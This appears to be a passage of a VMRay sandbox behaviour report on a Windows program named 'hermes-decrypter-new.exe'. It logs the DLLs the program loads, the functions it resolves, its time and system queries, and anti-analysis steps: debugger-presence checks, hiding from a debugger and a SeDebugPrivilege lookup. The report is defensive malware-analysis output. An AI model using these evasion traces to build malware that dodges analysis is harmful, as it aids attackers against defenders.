Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\MSVCR120_CLR0400.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\SHLWAPI.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\f12799647dc4f4abd2f0f17790337f04\mscorlib.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\CRYPTSP.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\system32\rsaenh.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\bcrypt.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\fcfb8bac8ea9a0e69d72c350b22f8e3f\System.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Drawing\5b307e2b9719b21749a8c73127ab5f45\System.Drawing.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\02d3b6022cc1ee466eb660dedcff59aa\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\psapi.dll, size = 2048 True 1
Fn
Get Filename c:\fd1hvy\hermes-decrypter-new.exe process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\FD1HVy\Hermes-decrypter-new.exe, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\ntdll.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\ntdll.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\kernel32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\KERNEL32.DLL, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\kernelbase.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\KERNELBASE.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\apphelp.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\ole32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\ole32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\combase.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\ucrtbase.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\RPCRT4.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\SspiCli.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\CRYPTBASE.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\bcryptPrimitives.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\sechost.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\GDI32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\gdi32full.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\msvcp_win.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\user32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\USER32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\win32u.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\oleaut32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\OLEAUT32.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\wtsapi32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\WTSAPI32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\msvcrt.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\IMM32.DLL, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\kernel.appcore.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\system32\uxtheme.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\mscoree.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\mscoree.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\ADVAPI32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\MSVCR120_CLR0400.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\SHLWAPI.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\f12799647dc4f4abd2f0f17790337f04\mscorlib.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\CRYPTSP.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\system32\rsaenh.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\bcrypt.dll, size = 2048 True 1
Fn
Get Filename c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\fcfb8bac8ea9a0e69d72c350b22f8e3f\System.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Drawing\5b307e2b9719b21749a8c73127ab5f45\System.Drawing.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\02d3b6022cc1ee466eb660dedcff59aa\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\psapi.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\version.dll, size = 2048 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x771a4ae0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x771a4b20 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x771a4b40 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x771a4b00 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x772c29e0 True 16
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x772c1ec0 True 6
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x771a5960 True 1
Fn
Get Address c:\windows\syswow64\mscoree.dll function = CLRCreateInstance, address_out = 0x73ba5000 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll function = getJit, address_out = 0x71ef3d60 True 1
Fn
Create Mapping - protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Map - process_name = c:\fd1hvy\hermes-decrypter-new.exe, address_out = 0x0 False 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System (13)
»
Operation Additional Information Success Count Logfile
Sleep duration = 0 milliseconds (0.000 seconds) True 4
Fn
Get Time type = System Time, time = 2019-05-24 16:59:52 (UTC) True 1
Fn
Get Time type = Ticks, time = 78625 True 1
Fn
Get Time type = Performance Ctr, time = 7865211877 True 1
Fn
Get Time type = System Time, time = 2019-05-24 16:59:53 (UTC) True 1
Fn
Get Time type = Ticks, time = 79515 True 1
Fn
Get Time type = Performance Ctr, time = 7954849931 True 1
Fn
Get Info type = SYSTEM_MODULE_INFORMATION False 1
Fn
Get Info type = SYSTEM_MODULE_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Debug (4)
»
Operation Process Additional Information Success Count Logfile
Check for Presence c:\fd1hvy\hermes-decrypter-new.exe - True 1
Fn
Check for Presence c:\fd1hvy\hermes-decrypter-new.exe - True 1
Fn
Check for Presence c:\fd1hvy\hermes-decrypter-new.exe - False 1
Fn
Hide c:\fd1hvy\hermes-decrypter-new.exe - True 1
Fn
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image